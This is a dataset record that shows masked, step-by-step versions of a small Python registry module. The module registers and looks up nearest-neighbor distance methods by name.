"step-1": "<mask token>\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\ndef get_method_names():\n return list(_method_adaptors.keys())\n",
"step-3": "<mask token>\n\n\ndef register_dist_adaptor(method_name):\n\n def decorator(func):\n _method_adaptors[method_name] = func\n\n def wrapper(*args, **kwargs):\n func(*args, **kwargs)\n return wrapper\n return decorator\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\ndef get_method_names():\n return list(_method_adaptors.keys())\n",
"step-4": "_method_adaptors = dict()\n\n\ndef register_dist_adaptor(method_name):\n\n def decorator(func):\n _method_adaptors[method_name] = func\n\n def wrapper(*args, **kwargs):\n func(*args, **kwargs)\n return wrapper\n return decorator\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\ndef get_method_names():\n return list(_method_adaptors.keys())\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.